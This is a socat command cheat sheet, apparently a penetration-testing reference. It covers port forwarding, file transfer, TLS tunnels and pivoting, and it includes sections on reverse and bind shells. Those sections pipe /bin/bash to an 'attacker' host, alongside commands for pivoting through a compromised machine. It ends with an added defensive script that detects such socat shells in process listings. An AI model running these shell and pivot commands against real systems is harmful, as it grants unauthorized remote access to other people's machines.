Socat
Socat is a command-line utility that establishes two independent bidirectional data channels and relays data between them. It is used for port forwarding, tunneling, and network manipulation.
Installation
# Debian/Ubuntu
sudo apt install socat
# Kali Linux (pre-installed)
which socat
# macOS
brew install socat
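# Build from source (the tarball is fetched over plain HTTP; check its checksum against a trusted value before building)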
wget http://www.dest-unreach.org/socat/download/socat-1.7.3.3.tar.gz
tar xzf socat-1.7.3.3.tar.gz && cd socat-1.7.3.3
./configure && make && sudo make install
Basic Usage
| Command | Description |
|---|---|
| `socat TCP-LISTEN:80 -` | Listen on port 80, print output to console |
| `socat TCP:target:80 -` | Connect to target:80, interact with stdin/stdout |
| `socat TCP-LISTEN:80 TCP:server:80` | Port forward: localhost:80 -> server:80 |
| `socat - TCP:target:23` | Connect to Telnet service |
Port Forwarding
# Forward local port 80 to remote server
socat TCP-LISTEN:80,reuseaddr,fork TCP:192.168.1.100:80
# Forward with an explicit bind address (0.0.0.0 means all interfaces, so the port is reachable from every network the host is on)
socat TCP-LISTEN:8080,reuseaddr,bind=0.0.0.0,fork TCP:target:80
# Bind to localhost only
socat TCP-LISTEN:8080,reuseaddr,bind=127.0.0.1,fork TCP:target:80
# Forward multiple connections (fork)
socat TCP-LISTEN:443,reuseaddr,fork TCP:192.168.1.50:443
# UDP port forward
socat UDP-LISTEN:53,reuseaddr,fork UDP:8.8.8.8:53
Reverse Shells
Reverse TCP Shell (Attacker Listener)
# Listening side (attacker)
socat TCP-LISTEN:4444,reuseaddr -
# Victim connects back
socat exec:/bin/bash TCP:attacker:4444
Reverse TCP Shell with Options
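# Attacker listener; fork keeps it accepting connections after a session ends
# (EXEC: stays off this side: a listener with EXEC:/bin/bash serves a shell on the listening host to anyone who connects)
socat TCP-LISTEN:4444,reuseaddr,fork -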
# Victim side (explicit redirection)
socat TCP:attacker:4444 EXEC:/bin/bash
Interactive Bind Shell
# Bind shell (victim listening)
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
# Connect to it (attacker)
socat TCP:target:4444 -
# Or with pty for better control (the pty options go on the side that runs EXEC, i.e. the listener)
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:'bash -li',pty,setsid,sigint,sane
File Transfer
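# Send file (server); socat needs two addresses, and -u makes the transfer one-way (file -> socket)
socat -u FILE:file.txt TCP-LISTEN:4444,reuseaddr
# Receive file (client)
socat -u TCP:server:4444 OPEN:file.txt,creat,trunc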
# Bidirectional file transfer
socat TCP-LISTEN:4444 FILE:file.txt
# Binary file transfer
socat TCP-LISTEN:4444,reuseaddr FILE:binary.exe
Encrypted Tunneling
SSL/TLS Port Forward
# Generate SSL certificate (listener side)
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout key.pem
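# Create SSL listener (key= is required because the private key is in a separate file; verify=0 means client certificates are not checked)
socat OPENSSL-LISTEN:4444,cert=cert.pem,key=key.pem,verify=0,reuseaddr,fork TCP:target:80
# Connect via SSL (verify=0 skips certificate verification, so the server is not authenticated; to authenticate it, remove verify=0 and supply the certificate with cafile=cert.pem)
socat - OPENSSL:server:4444,verify=0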
Command Execution
# Execute command and read output
socat TCP-LISTEN:4444 EXEC:"whoami"
# Execute command and provide input
socat TCP-LISTEN:4444 EXEC:/bin/bash
# Execute with pseudo-terminal
socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash,pty,setsid,sigint
# Run command as a given user (su= switches user and only works when socat itself already runs as root; it does not elevate privileges)
socat TCP-LISTEN:4444 EXEC:"/bin/bash",su=root
Tunneling and Pivoting
SOCKS Tunneling
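# Relay a local port through an existing SOCKS4a server at 127.0.0.1:8080 (socat acts as the SOCKS client, not as a proxy server)
socat TCP-LISTEN:1080,reuseaddr,fork SOCKS4A:127.0.0.1:target:80,socksport=8080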
Chain Multiple Connections
# Two-way relay
socat TCP-LISTEN:8080 TCP:final-target:80
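# UDP to TCP relay (moves raw bytes only; DNS over TCP expects a 2-byte length prefix, so DNS queries are not translated by this)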
socat UDP-LISTEN:53,reuseaddr,fork TCP:8.8.8.8:53
Interactive Connection
# Connect to TCP service
socat - TCP:target:22
# Connect to UDP service
socat - UDP:target:53
# Connect with telnet
socat - TCP:target:23
# Connect to HTTP
socat - TCP:target:80
# With readline support
socat readline TCP:target:23
Advanced Options
# Fork on each connection
socat ... ,fork
# Reuse address (don't wait for TIME_WAIT)
socat ... ,reuseaddr
# Bind to specific interface
socat TCP-LISTEN:80,bind=192.168.1.100 ...
# Set keepalive
socat ... ,keepalive
# Set socket options
socat ... ,so-reuseaddr,so-keepalive
# Dump transferred data to stderr as text
socat -v TCP-LISTEN:80 TCP:target:80
# Add diagnostic messages (repeat -d for more detail)
socat -d -d -v TCP-LISTEN:80 TCP:target:80
# Hex output
socat -x TCP-LISTEN:80 TCP:target:80
Practical Examples
Pivot Through Compromised Host
# On compromised machine
socat TCP-LISTEN:9999,reuseaddr,fork TCP:internal-network-host:80
# From attacker machine
socat - TCP:compromised-host:9999
Expose Internal Service
# Make internal service available externally
socat TCP-LISTEN:80,reuseaddr,fork TCP:127.0.0.1:8080
DNS Tunneling
# Relay DNS through firewall (a plain UDP forward to an upstream resolver; it does not encapsulate other traffic in DNS)
socat UDP-LISTEN:53,reuseaddr,fork UDP:8.8.8.8:53
Reverse VPN-like Tunnel
# Victim initiates connection, attacker gets shell
socat TCP:attacker:4444 EXEC:/bin/bash
# Attacker listener
socat TCP-LISTEN:4444 -
Data Dumping and Analysis
# Capture and display traffic
socat -v TCP-LISTEN:80,reuseaddr,fork TCP:target:80
# Hex dump
socat -x TCP-LISTEN:80 TCP:target:80
# Save traffic to file (-v writes the relayed data to stderr)
socat -v TCP-LISTEN:80,reuseaddr,fork TCP:target:80 2> traffic.txt
Troubleshooting
# Check if port is already in use
netstat -tulpn | grep 4444
# Kill socat process
pkill -f socat
# Enable verbose debugging
socat -d -d TCP-LISTEN:4444 TCP:target:80
# Test connection
socat TCP-LISTEN:4444,reuseaddr,fork -
# Then: nc localhost 4444
Common Options Summary
TCP-LISTEN:port # Listen on TCP port
TCP:host:port # Connect to TCP
UDP-LISTEN:port # Listen on UDP
UDP:host:port # Connect to UDP
EXEC:cmd # Execute command
FILE:path # File operations
OPENSSL:host:port # SSL connection
OPENSSL-LISTEN:port # SSL listener
- # Stdin/stdout
,fork # New process per connection
,reuseaddr # Reuse socket address
,bind=addr # Bind to interface
,pty # Pseudo-terminal
,su=user # Switch user
,verify=0 # Skip SSL verification
-v # Verbose output (dumps transferred data to stderr)
-x # Hex output
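The address types and options summarized above are also what a defender looks for in process listings. The following is an added example, not part of the original cheat sheet: a POSIX shell triage function that flags socat command lines wiring EXEC:/SYSTEM: to a network address, listeners not bound to loopback, and verify=0. The finding labels and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage socat command lines (from `ps -eo args` or EXECVE audit
# records) for risky patterns. The finding labels are made up for this example.

classify_socat() {   # $1 = one command line; prints findings, "none" or "not-socat"
    seen=0 has_exec=0 has_net=0 open_listen=0 no_verify=0
    while read -r w; do
        case "$w" in socat|*/socat) seen=1; continue ;; esac
        [ "$seen" -eq 1 ] || continue
        case "$w" in exec:*|system:*) has_exec=1 ;; esac
        case "$w" in tcp*:*|udp*:*|openssl*:*|ssl*:*) has_net=1 ;; esac
        case "$w" in *,verify=0*) no_verify=1 ;; esac
        case "$w" in
            *-listen:*|*-l:*)      # a listener is only local when bound to loopback
                case "$w" in
                    *,bind=127.*|*,bind=localhost*|*,bind=\[::1\]*) ;;
                    *) open_listen=1 ;;
                esac ;;
        esac
    done <<EOF
$(printf '%s\n' "$1" | tr -s ' \t' '\n\n' | tr '[:upper:]' '[:lower:]')
EOF
    [ "$seen" -eq 1 ] || { echo "not-socat"; return 0; }
    out=""
    # A command or shell wired to a network address is a bind or reverse shell.
    if [ "$has_exec" -eq 1 ] && [ "$has_net" -eq 1 ]; then out="$out shell-over-network"; fi
    if [ "$open_listen" -eq 1 ]; then out="$out listener-not-loopback"; fi
    if [ "$no_verify" -eq 1 ]; then out="$out tls-unverified"; fi
    out=${out# }
    echo "${out:-none}"
}

# Constructed sample input, built from command lines that appear on this page.
SAMPLE='socat exec:/bin/bash TCP:attacker:4444
socat TCP-LISTEN:8080,reuseaddr,bind=127.0.0.1,fork TCP:target:80
/usr/bin/socat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0,reuseaddr,fork TCP:target:80
socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash,pty,setsid,sigint
nc -lvnp 4444'

scan() {             # reads command lines on stdin, prints "findings<TAB>line" for hits
    while IFS= read -r line; do
        f=$(classify_socat "$line")
        case "$f" in none|not-socat) ;; *) printf '%s\t%s\n' "$f" "$line" ;; esac
    done
}

printf '%s\n' "$SAMPLE" | scan
```

The word splitting is deliberately naive because process listings and audit records carry arguments unquoted; treat a hit as a lead to investigate, not a verdict.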
Last updated: March 2026